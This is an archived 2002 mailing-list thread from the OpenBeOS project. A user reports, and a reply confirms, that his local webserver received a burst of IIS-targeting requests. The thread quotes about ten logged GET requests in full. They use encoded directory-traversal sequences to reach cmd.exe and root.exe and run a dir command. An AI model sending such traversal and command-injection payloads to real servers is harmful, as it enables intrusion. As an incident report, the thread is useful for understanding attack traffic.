[openbeos] Re: I think someone tried to hack into my machine

• From: GThom@xxxxxxxxxxxxxxxxxx
• To: openbeos@xxxxxxxxxxxxx
• Date: Tue, 19 Mar 2002 08:13:52 -0500

I run a personal web-server using RobinHood (Road-Runner Cable Modem), I get
this all the time!!! 

They are very standard methods of hacking IIS. 

Gary Thom

-----Original Message-----
From: Daniel Reinhold [mailto:danielr@xxxxxxxxxxxxx]
Sent: 19 March, 2002 2:49 AM
To: Public OBOS mailing list
Subject: [openbeos] I think someone tried to hack into my machine

Ok, this was rather interesting. It happened just about fifteen minutes
ago (as I'm writing this).

I'm online (PPP dialup) and am also running a local webserver (i.e.
sending requests to loopback address 127.0.0.1). Yeah, that's asking
for trouble, at least theoretically. That is, someone on the internet,
if they happened to get a hold of my (temporary, dynamically assigned)
IP, could send requests for local files and have them sent back out
across the network. I've never had anything weird happen before, so
I've always been pretty blase about the security risk.

Anyway, I'm just testing some news items locally before copying them
over to the OpenBeOS website (which is my usual MO). Suddenly, I notice
the Terminal window (largely covered by another window, but partially
showing) has a flurry of text flying by and the DUN replicant in the
Deskbar shows lots of bytes transmitting back and forth. Wtf? So I
uncover the Terminal window (which is running the webserver) and see
that a number of unusual requests have just been attended to. Here's
the first one:

GET /scripts/root.exe?/c+dir HTTP/1.0
Host: www
Connnection: close

The remaining requests all look like that but with different URLs. Here
are the other URLs that were requested:

GET /MSADC/root.exe?/c+dir HTTP/1.0
GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+
dir HTTP/1.0
GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+
dir HTTP/1.0
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0

To me, that looks all the world like some hacker trying to grab files
from my local machine. Could there be another explanation?

Of course, I'm running BeOS (and don't have NT) so my local webserver
just returned a bunch of 404 (Not found) responses. Still, makes you
wonder.

Has anyone else on this list had any similar experiences? What do you
make of this?

Other related posts:

• » [openbeos] I think someone tried to hack into my machine
• » [openbeos] Re: I think someone tried to hack into my machine
• » [openbeos] Re: I think someone tried to hack into my machine
• » [openbeos] Re: I think someone tried to hack into my machine
• » [openbeos] Re: I think someone tried to hack into my machine
• » [openbeos] Re: I think someone tried to hack into my machine
• » [openbeos] Re: I think someone tried to hack into my machine
• » [openbeos] Re: I think someone tried to hack into my machine
• » [openbeos] Re: I think someone tried to hack into my machine
• » [openbeos] Re: I think someone tried to hack into my machine
• » [openbeos] Re: I think someone tried to hack into my machine

1. Home
2. haiku
3. Archive
4. 03-2002

---

• » Previous by Date
• » Next by Date
• » Related Posts
• » View list details
• » Manage your subscription

---